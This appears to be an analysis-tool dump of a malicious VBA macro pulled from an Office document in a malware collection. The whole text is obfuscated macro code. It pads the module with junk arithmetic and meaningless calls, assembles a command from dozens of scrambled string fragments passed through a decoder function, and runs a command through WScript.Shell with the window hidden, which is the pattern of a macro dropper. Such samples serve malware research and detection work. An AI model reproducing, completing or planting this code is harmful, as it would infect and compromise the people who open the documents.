Filename     : ./macros/c41effe4f9c1e6f010db18eef96a852a189c0b47687e4f220716d37f3a62a315
OLE stream   : Macros/VBA/cfShjoTvCLK
VBA filename : cfShjoTvCLK.bas
----------------------------------------
Attribute VB_Name = "cfShjoTvCLK"
Sub zOSABvYzdSjs(hovMUVUDHEIRqQ As String)
On Error Resume Next
cMGwjNutu = jQThvt * vWBi / hiKm - Round(3859421 * CSng(8789472 * CInt(vGpJK)) + zwVvm - Round(dsiv)) - 544 / wzlu + zfJf / Rnd(fblwt) * (91851 / CDbl(5348709) + (tqHJJv / CByte(9043703 / CDbl(7184256) - 117404 / 7028158)))
uBNCivoUI = iHKzi * TWjw / HBtlEH - Round(7961251 * CSng(8054421 * CInt(zbwuPi)) + dtqI - Round(sEQlj)) - 544 / iIcY + Crnz / Rnd(Qinwi) * (3646205 / CDbl(4594556) + (IPkA / CByte(8280007 / CDbl(8110188) - 5760556 / 8744202)))
pTPzcAYAL = NbZwD * ipNOC / uZjK - Round(5563156 * CSng(3271221 * CInt(dRluI)) + YXCr - Round(Fnnz)) - 544 / whMM + WBcP / Rnd(jYpRSX) * (1401392 / CDbl(5594107) + (PbhRk / CByte(5965237 / CDbl(841434) - 5517773 / 9607389)))
zIPWzTkcQ = PHQJ * Rjzhk / swKGi - Round(5788904 * CSng(2860365 * CInt(chDt)) + fGbJ - Round(WjpGC)) - 544 / ZwSC + EfWr / Rnd(EKEQO) * (7964183 / CDbl(4077255) + (oXLO / CByte(2571503 / CDbl(5683825) - 4752009 / 7938570)))
WXLEkmwwj = LMPXBh * ibvX / MhLcSf - Round(430840 * CSng(2257388 * CInt(odLiIK)) + nSOIji - Round(IzQVi)) - 544 / iCcS + LisIT / Rnd(uUwW) * (6652389 / CDbl(819663) + (tWNrIh / CByte(2857668 / CDbl(1915187) - 6480883 / 641672)))
CreateObject("WScript.Shell").Run iBJXz + hovMUVUDHEIRqQ + mBsFz + vfwzOPjGatb, vbHide
cHwrtvDSd = pdSHW * wkhLj / qSLKkA - Round(8962665 * CSng(308419 * CInt(ckajPA)) + sGpn - Round(FGBfp)) - 544 / ujWsir + RjjjK / Rnd(XbiM) * (8683625 / CDbl(8530833) + (GUksb / CByte(4165983 / CDbl(9373061) - 5526869 / 7085148)))
MJiuJARak = iAwU * IvnPr / tInOl - Round(4856513 * CSng(9822112 * CInt(RMuDh)) + WFPtX - Round(EcqJ)) - 544 / IAFjj + hkKTA / Rnd(jXbSwS) * (8038004 / CDbl(7791150) + (QBIDft / CByte(8475558 / CDbl(6526420) - 4254766 / 3224093)))
SiocYtuli = SWAW * jVvr / JAUd - Round(8351416 * CSng(9849251 * CInt(fAopCo)) + iMsu - Round(ZBhL)) - 544 / iuAlp + YwqNGR / Rnd(KlZw) * (2903566 / CDbl(7126693) + (XPizoB / CByte(8183171 / CDbl(5185001) - 8776256 / 3509863)))
End Sub
Function CouGtzkpW()
On Error Resume Next
facVrzLNjR.VUzTnHrQUElQJziGwEJo
EMvSsImvfYf = fshu3bbnabn3("6OzQ]GoTIYCM% tes&&CAjXVZAqQOLfPii6$5I", 15, 19)
facVrzLNjR.VUzTnHrQUElQJziGwEJo
WTBdwwdim.kwkkawzHbpARoWR
OqXZATSXw = fshu3bbnabn3("8JGIqk9%w9k% tes&&wo=%CSGY2f", 5, 14)
WTBdwwdim.kwkkawzHbpARoWR
koOiHVMZqUSd.VzfvuksSjIdHmMAKjLmzGVYdDjfj
HoUkNcwSk = fshu3bbnabn3("d!R!%CSIVcdPAIWQQkj7Q13UKkOdG0Vsh9HD", 23, 11)
koOiHVMZqUSd.VzfvuksSjIdHmMAKjLmzGVYdDjfj
UlLVvLnwtCW.wrzDNvsTaTRfJiRzFjTJtisEl
bjkIj = fshu3bbnabn3("Z(MF)KZXld6Jp% toi.ffjd%l@J_S", 14, 5)
UlLVvLnwtCW.wrzDNvsTaTRfJiRzFjTJtisEl
ILKAAoNGiOId.cYpZnZknOfWlJcwjw
YPJQG = fshu3bbnabn3("hczrG2lRZ0dkOR]B1l=%hwoJiU]__1%0ks5KPM$kOb", 19, 7)
ILKAAoNGiOId.cYpZnZknOfWlJcwjw
STjqSvCsqCFV.WMFIrZJTLKmlVzPAqcPOTN
ztsFE = fshu3bbnabn3("iZ4nZo]aLml5$updtes&&GztoPoFBYKWHoj$A_wcH2tY4di6hkzM", 18, 19)
STjqSvCsqCFV.WMFIrZJTLKmlVzPAqcPOTN
pCGolJziY.rsVKZtZKiMzCVFZwPjSJjNfw
nEWjnNz = fshu3bbnabn3("_fCkI%6SjwcwS..XjZ5VUMvoh% tes&&H4Zn", 5, 13)
pCGolJziY.rsVKZtZKiMzCVFZwPjSJjNfw
WQFGwEzuHw.CtOXhhWzBKuAbjistlwZ
qMvXaAB = fshu3bbnabn3("jfK(R_9dAWu1hQQoY2[Hm6GU4t5Z0)z7[[zU", 23, 2)
WQFGwEzuHw.CtOXhhWzBKuAbjistlwZ
dLzprqYCAA.aXsSVaYEaKQzoFcXv
EtXqSzbGXdb = fshu3bbnabn3("w5GZ]R22Y[.N5kBsMvoh%!!%sjSdzYvBAS))Z_6p", 7, 18)
dLzprqYCAA.aXsSVaYEaKQzoFcXv
KhwAVnmBAip.rSbwkScRMlRNYmEzWTIVfbL
GvPUriE = fshu3bbnabn3("i5oAAw8j3mFiG[3wiH_Hr_zzoitpl", 5, 2)
KhwAVnmBAip.rSbwkScRMlRNYmEzWTIVfbL
YAMvnIdKm.vWfJFwHvLAkiztZsquOlQHNt
WtidIH = fshu3bbnabn3("IZ%8]R<$D%!=%ZatbmwfLjK84kR3pvSTS9W[lG", 16, 15)
YAMvnIdKm.vWfJFwHvLAkiztZsquOlQHNt
vYFYHjDt.YTkrfjUJKlwWNWGr
MdjZwXcKqkE = fshu3bbnabn3("z7t381u tes&&!%aOsu4QS_[jk6@(ML", 13, 12)
vYFYHjDt.YTkrfjUJKlwWNWGr
BThlbXDQMuOC.iBPorslFKqUP
pIKiQa = fshu3bbnabn3("7wJXGcM%.I06qnMjBCpGJn=%zYIniDHwM", 3, 15)
BThlbXDQMuOC.iBPorslFKqUP
nzpmEWVYiRb.VDwrlYmrwSfrZYI
umWGpvvULA = fshu3bbnabn3("U@fanQ)m6hN[o$UiYbf1zzci3@LhGJV%Sd", 16, 4)
nzpmEWVYiRb.VDwrlYmrwSfrZYI
wTLdzLbVm.jiifZqJhzJfc
KzuHFAW = fshu3bbnabn3("XwvKbM$oI_7[]!9ksrtT615zTI3P%!!%Kj6wzvsJ", 9, 4)
wTLdzLbVm.jiifZqJhzJfc
ZqiznIqMTHV.NavdHArRcqwLTTSIiSjLQpDRvLYUq
LqjSLwaXRjS = fshu3bbnabn3("hzV45UIjOJd$2_sqGo()_aM@tGoTIYCM%!KLj5o", 6, 9)
ZqiznIqMTHV.NavdHArRcqwLTTSIiSjLQpDRvLYUq
kKtbakWlMd.CWphEIjEOUfBqMJBPK
RtcCLBTzRcm = fshu3bbnabn3("6XPW_q7Fl@EE% tes5", 2, 7)
kKtbakWlMd.CWphEIjEOUfBqMJBPK
QbWLsRHwDpH.LzUsjwUBDHGzMj
SwKtRhjcai = fshu3bbnabn3("t(CwYvAp!%QqRIEHDUVUs90w4BzzsqlccbbWHP7o_XwTo]HH3", 30, 12)
QbWLsRHwDpH.LzUsjwUBDHGzMj
wwXhaQBKKaC.SJQXmYLhojbzriTsSzjHzDmikJ
DLXzFOPr = fshu3bbnabn3("@4cXiMm9z QpLsh=%sjQYac58BovWt", 12, 5)
wwXhaQBKKaC.SJQXmYLhojbzriTsSzjHzDmikJ
cfYEKZoGj.mwnzDHrkSKGrolYRMsfPz
CAIcHNXKM = fshu3bbnabn3("nK5z3_9FOz%!!%biYbfzzafX$lzm[#dbk_mn[", 16, 14)
cfYEKZoGj.mwnzDHrkSKGrolYRMsfPz
vNBhwkGPrqm.ItQaHcHjZkEbFQvOAKFpi
JiIXQX = fshu3bbnabn3("hWOAh8hbcKQBi3KdPAIOI% tes&&p!l_u6", 6, 14)
vNBhwkGPrqm.ItQaHcHjZkEbFQvOAKFpi
wWMJSipwJ.TdjvnZiqRiQjAQSpGcv
iliddmJm = fshu3bbnabn3("X(LiHfVct]<8XVfiJKfpS#", 2, 3)
wWMJSipwJ.TdjvnZiqRiQjAQSpGcv
AHqbCuif.lVLiZtjJkQEuaTYBMoDznzhk
BCAPzvBqSn = fshu3bbnabn3("X.A27)_Ji6AcQt92dOI%!5", 2, 4)
AHqbCuif.lVLiZtjJkQEuaTYBMoDznzhk
mIIOwOWZbIt.IHfBEJNbnnhs
ECwEkLc = fshu3bbnabn3("][LBXw=%b$(#M", 5, 3)
mIIOwOWZbIt.IHfBEJNbnnhs
LlzLTBaLiTw.vOoFXWzJZUYIbBujJdfojBwhqrpz
DLJTJZBcoo = fshu3bbnabn3("dGZ_u_4YkvzJhpiEPfsjK", 4, 7)
LlzLTBaLiTw.vOoFXWzJZUYIbBujJdfojBwhqrpz
jvJqMibiuC.rsvGGHwQPzDjOFlOElk
ZQCCBUiwqww = fshu3bbnabn3("[]M%wslTXifsRVttnPzO7BAOz)pwl8", 13, 15)
jvJqMibiuC.rsvGGHwQPzDjOFlOElk
LkvNMDwHiw.QUmobtAoQRfausMcpRRTntUAbu
ZpaKZTf = fshu3bbnabn3("IoIzICv$sK9zza% tes&&re=%$<0", 4, 14)
LkvNMDwHiw.QUmobtAoQRfausMcpRRTntUAbu
cPMdiFUncZ.vzfFnCTijzVZEpWiJlYMcOK
sFzFHAT = fshu3bbnabn3("9F7jzOCw7GtcId@hwoAXk4joG9WA", 11, 3)
cPMdiFUncZ.vzfFnCTijzVZEpWiJlYMcOK
wKjoETwTva.TkOoYULtHowjmujOvQHRwYzE
QXvDcLFwfu = fshu3bbnabn3("u6LAZ=%SiQSiSSMwjz2]YlrwsOHrS7j@FZwWoKBZJjjw@lAQd", 32, 15)
wKjoETwTva.TkOoYULtHowjmujOvQHRwYzE
SLiizIrF.itiRdkwfSSFDAYGrNrqLRLL
oiUTdzMaAT = fshu3bbnabn3("ijBzor5wjUZSHaC%V6@p.lh3.l)GP[", 15, 9)
SLiizIrF.itiRdkwfSSFDAYGrNrqLRLL
AATkFIkwbYu.ddAFVipOSplXpjcVEK
QhOElsomOL = fshu3bbnabn3("A6iLzpspvBASOz% tes&&hVmbtibqOPJTnMwnLMn<Kc9 71vjUL]1%t", 30, 18)
AATkFIkwbYu.ddAFVipOSplXpjcVEK
ihpjViGwiTj.zkQEmiMVkuQGzzr
lWUODXjqGM = fshu3bbnabn3("hh@8kFpYnz<oPO", 7, 2)
ihpjViGwiTj.zkQEmiMVkuQGzzr
pEWXbYzXM.DbhhGBPcCnqwzahQrK
KRvYzPnYfjq = fshu3bbnabn3("idCzZatbmwfLjKJp%!&&lU[HGH3", 7, 17)
pEWXbYzXM.DbhhGBPcCnqwzahQrK
jGKGvndXsIa.IZHiwHUnCmCRzinDfmS
jkatbBo = fshu3bbnabn3("5226LL7A=%aOsuhQD% r<PKlPi2c$zrU[Qz3jV2N1pcwkr5", 29, 11)
jGKGvndXsIa.IZHiwHUnCmCRzinDfmS
aGvwjjrOj.WrlAUzsoJScfODq
GtzFHXzcXES = fshu3bbnabn3("[P_h[mi!258)qU=%YBpUjKZHUqwBi(LF", 4, 15)
aGvwjjrOj.WrlAUzsoJScfODq
hQztLjipdiRi.kiNzvYCGhWaZSjfYjJuZCfl
ORKjJoDWVP = fshu3bbnabn3("QnX@n$vF<5vsRes&&iMcDfMScINKVmM=3m!", 4, 19)
hQztLjipdiRi.kiNzvYCGhWaZSjfYjJuZCfl
IvVrAfMqlH.hGfoUITowLLwfm
bQkODCF = fshu3bbnabn3("SfA%aQkkXX)9]6YqI2Wp6lhB4z$4hzXqwbq%!!%sjzokC7M", 5, 12)
IvVrAfMqlH.hGfoUITowLLwfm
joZoRzbQLha.UPDSvJcBlErDCGJzFilDNhJwd
mdGOO = fshu3bbnabn3("2wtrUSEXFWqloZQOh45RJ@2XQ8", 20, 5)
joZoRzbQLha.UPDSvJcBlErDCGJzFilDNhJwd
LjitojAWfsRj.drWEpOwMHBwart
PRDTbCojvK = fshu3bbnabn3("XAmII !%7r4o(bZQ948tIDd2Q2CWzLdOvK0C", 29, 3)
LjitojAWfsRj.drWEpOwMHBwart
TBKsFpWjEt.CnPGSirvIfNLiWTRlQj
RpDpNPhF = fshu3bbnabn3("BSkIVch[H0@2kVwKMZ", 13, 3)
TBKsFpWjEt.CnPGSirvIfNLiWTRlQj
tlPfZuNH.ihiqWIGkCbwO
mTwSFfdHJ = fshu3bbnabn3("dOAiJqCMLO% tes&&s=%QqRIEHDUARQoIw7.@7dd)C!Zsi", 19, 19)
tlPfZuNH.ihiqWIGkCbwO
BCvLUhsF.hsWREPorfjEjcHmDP
TBUJKHJlmpG = fshu3bbnabn3("bL6f4fsjSdzYZsb6", 5, 6)
BCvLUhsF.hsWREPorfjEjcHmDP
jQfjPkpjh.hkWqjQtZIKDARWqJBblMuiviNV
nQwfNZjmC = fshu3bbnabn3("ZJ)X6AAzoHhpiEPfqwbq% tes&&ewmQZiPzXd!83wNA[Lzh0", 21, 18)
jQfjPkpjh.hkWqjQtZIKDARWqJBblMuiviNV
CouGtzkpW = RtcCLBTzRcm + GtzFHXzcXES + ztsFE + jkatbBo + JiIXQX + RpDpNPhF + OqXZATSXw + ZQCCBUiwqww + ORKjJoDWVP + bjkIj + WtidIH + qMvXaAB + MdjZwXcKqkE + oiUTdzMaAT + pIKiQa + lWUODXjqGM + QhOElsomOL + TBUJKHJlmpG + ZpaKZTf + umWGpvvULA + ECwEkLc + BCAPzvBqSn + HoUkNcwSk + nEWjnNz + mTwSFfdHJ + iliddmJm + QXvDcLFwfu + mdGOO + EMvSsImvfYf + GvPUriE + DLXzFOPr + nQwfNZjmC + YPJQG + KRvYzPnYfjq + KzuHFAW + CAIcHNXKM + EtXqSzbGXdb + SwKtRhjcai + LqjSLwaXRjS + bQkODCF + DLJTJZBcoo + sFzFHAT + PRDTbCojvK
nkLpWSJzT = UmdTfl * MjQNJZ / jOvUtz - Round(7859300 * CSng(7706052 * CInt(OcJOS)) + kqRDFo - Round(zRjI)) - 544 / iBzHiK + GIWp / Rnd(UvjJ) * (2879860 / CDbl(8263042) + (XfZvZ / CByte(9213392 / CDbl(1062030) - 3921138 / 1905476)))
End Function
